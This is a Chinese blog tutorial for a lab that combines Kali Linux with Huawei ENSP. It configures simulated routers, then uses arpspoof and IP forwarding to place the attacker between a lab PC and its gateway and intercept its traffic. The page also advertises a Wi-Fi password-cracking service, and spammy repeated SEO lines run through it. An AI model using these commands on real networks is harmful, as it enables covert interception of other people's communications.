Kali linux与ENSP综合实验(实现ARP攻击和欺骗)

caocao1年前教程247

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

kali如何对手机进行网络攻击

ARP(地址解析协议)简介

ARP(Address Resolution Protocol)是一种基于TCP/IP协议的网络协议,用于根据IP地址获取物理地址。当主机发送信息时,会广播包含目标IP地址的ARP请求到局域网上的所有主机,并接收返回消息以确定目标的物理地址。收到返回消息后,主机将该IP地址和物理地址存入本机的ARP缓存中,并保留一定时间。下次请求时,可以直接查询ARP缓存,以节约资源。地址解析协议建立在网络中各个主机互相信任的基础上,局域网上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性,直接将其记入本机ARP缓存。这就构成了ARP欺骗,攻击者可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机。

ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系,添加或删除静态对应关系等。相关协议还包括RARP(逆地址解析协议)和代理ARP。在IPv6中,NDP(邻居发现协议)用于代替地址解析协议。

ARP病毒攻击是局域网中最常见的一种攻击方式。由于TCP/IP协议存在的一些漏洞,ARP病毒可以利用这些漏洞进行欺骗攻击,严重影响人们的上网和通信安全。当局域网内的计算机遭到ARP攻击时,会持续向局域网内所有的计算机和网络通信设备发送大量的ARP欺骗数据包。如果不及时处理,会导致网络通道阻塞、网络设备负载过重以及通讯质量下降等问题。

在这里,我们使用Kali Linux和华为ENSP进行综合实验,实验比较简单,只对ENSP设备进行配置,不对其他靶机进行试验。ENSP网络拓扑图如下:

<Huawei>system-view 
[Huawei]sysname google
[google]int g0/0/0
[google-GigabitEthernet0/0/0]ip address 100.1.1.2 24		//配置接口0/0/0的IP地址
[google]int lo 0
[google-LoopBack0]ip address 8.8.8.8 24						//为环回接口设置IP地址
<Huawei>system-view 
[Huawei]sysname GW
[GW]int g0/0/0
[GW-GigabitEthernet0/0/0]ip address 192.168.1.254 24	
[GW]int g0/0/1
[GW-GigabitEthernet0/0/1]ip address 100.1.1.1 24		//配置ip	
[GW]dhcp enable 		//开启DHCP
[GW]int g0/0/0
[GW-GigabitEthernet0/0/0]dhcp select interface 	
[GW-GigabitEthernet0/0/0]dhcp server dns-list 192.168.1.254
kali如何对手机进行网络攻击

ENSP设备配置

首先对ENSP设备进行简单配置:

  1. 将AR4命名为谷歌服务器(Google server)配置。
  2. 将AR4命名为网关(GW)配置。
  3. 为GW开启DHCP服务和DNS。
  4. PC2获取的IP地址为192.168.1.253。
kali如何对手机进行网络攻击kali如何对手机进行网络攻击kali如何对手机进行网络攻击kali如何对手机进行网络攻击
[GW]acl 2000
[GW-acl-basic-2000]rule permit  source 192.168.1.0 0.0.0.255
为设备绑定2000
[GW-acl-basic-2000]int g0/0/1
[GW-GigabitEthernet0/0/1]nat outbound 2000
[GW]dns proxy enable
[GW]ip host google.com 8.8.8.8		//设置域名
配置静态路由
[GW]ip route-static 0.0.0.0 0.0.0.0 g0/0/1 100.1.1.2	
//配置一条静态路由,使PC2能够ping通google服务器
kali如何对手机进行网络攻击

PC2对GW进行ping,使用命令arp -a查看MAC列表,可以看到GW的g0/0/0接口的MAC地址。

  1. 为GW进行ACL配置。
  2. 此时PC2可以ping通8.8.8.8,并且能够ping通域名google.com。
kali如何对手机进行网络攻击kali如何对手机进行网络攻击kali如何对手机进行网络攻击
root@wangzhike :~#apt-get install dsniff ssldump

正常情况下,PC2的MAC表如下:

  1. 接下来,我们配置最重要的环节——云设置。我们将桥接到Kali Linux上,使用VMnet1。

  2. Kali Linux的配置。注意:我们为Kali Linux添加一张网卡,桥接到VMnet1中。在进行配置之前,请确保打开Kali Linux并下载相应的包,否则在桥接后无法连接到网络无法进行下载。

kali如何对手机进行网络攻击kali如何对手机进行网络攻击
root@wangzhike :~#dhclient eth1
kali如何对手机进行网络攻击kali如何对手机进行网络攻击
  1. 打开虚拟机的虚拟网络编辑器,修改VMnet1,为Kali Linux添加网卡,并桥接到VMnet1上。桥接后,打开Kali Linux并使用命令获取IP地址。Kali Linux的eth1网卡获取的IP地址为192.168.1.252,MAC地址为00-0c-29-78-04-23。此时,Kali Linux和ENSP可以互通。
root@wangzhike :~#arpspoof -i eth1 -t 192.168.1.253 192.168.1.254
kali如何对手机进行网络攻击kali如何对手机进行网络攻击
root@wangzhike :~#echo “1” > /proc/sys/net/ipv4/ip_forward
root@wangzhike :~#cat /proc/sys/net/ipv4/ip_forward
1
  1. Kali Linux对PC2进行ARP攻击。对目标主机PC2进行攻击(攻击不要断开)。PC2无法ping通谷歌服务器,断网。使用长ping -t命令可以实现Kali Linux对PC2靶机的欺骗。为避免被怀疑,需要开启转发功能。

  2. Kali Linux对PC2进行ARP欺骗。Kali Linux临时开启转发功能,默认为0,需要修改为1。

kali如何对手机进行网络攻击kali如何对手机进行网络攻击kali如何对手机进行网络攻击

此时,PC2进行的长ping连接通了。对比之前正常PC2的MAC表,可以看到在欺骗后,靶机PC2要到谷歌服务器的所有流量都会经过Kali Linux,再从Kali Linux流向谷歌服务器。从而Kali Linux可以截取靶机的信息。

这个实验相对简易,无法使用其他工具对靶机进行图片抓取和密码抓取。主要是为了使用ENSP进行实验。哈哈哈!

相关文章

放大倍数超 5 万倍的 Memcached DDoS 反射攻击,怎么破?

放大倍数超 5 万倍的 Memcached DDoS 反射攻击,怎么破?

背景 最近,利用Memcached服务器进行反射DDoS攻击的事件呈现出明显的上升趋势。DDoS攻击流量首次突破T级,引起了业界的广泛关注。现在,腾讯游戏云将回顾整个事件如下: 追溯2月27日的消息,...

高效课堂22条

高效课堂22条

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 局办公室 2011年第...

ewsa,请教EWSA跑包是利用了显卡的浮点运算能力吗

ewsa,请教EWSA跑包是利用了显卡的浮点运算能力吗

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 本文目录一览1,请教EW...

# 3.3 HTTPS RSA 握手解析

# 3.3 HTTPS RSA 握手解析

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 事实上,不同的密钥交换算...